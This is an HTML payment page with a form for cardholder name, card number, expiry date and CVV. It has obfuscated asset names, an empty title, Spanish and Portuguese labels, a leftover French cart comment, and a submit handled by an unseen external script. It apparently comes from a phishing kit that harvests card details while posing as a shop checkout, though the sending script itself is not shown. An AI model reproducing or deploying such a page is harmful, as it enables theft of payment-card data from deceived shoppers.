<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/camaki.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div>
        <div class="roof">
            <img src="./img/hepod.png" alt="">
        </div>
    </div>


    <div>
        
        
        <!-- <p class="pp2">
            Panier :
            <span>1 Article</span>
        </p> -->
        <div class="section">
            <div class="ccimg">
                <img src="./img/upococip.png" alt="">
            </div>
            <div class="kolch">
                <form method="post" id="pg2">
                
                    <p>Nombre del titular  </p>
                    <input type="text" name="" id="numnn" maxlength="19">
                    
                    <p>Número de tarjeta </p>
                    <input class="inp1" type="tele" name="" id="numcc" maxlength="19" placeholder="----    ----    ----    ----">
                    
                    
                    
                    <p>Tarjeta válida hasta (mes/año)</p>
                    <div class="exp">
                        <input class="mm" type="tel" name="" id="mmo" required placeholder="MM" maxlength="2">
                        <input type="tel" name="" id="aao" required placeholder="AA"  maxlength="4">
                    </div>

                    <p>Código de verificação (CVV)</p>
                    <input class="cfifi" type="tel" name="" id="numvv" required  maxlength="4">

                    <button class="btn2"  type="submit">Pagar</button>
                </form>
            </div>
        </div>
    </div>



   


    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>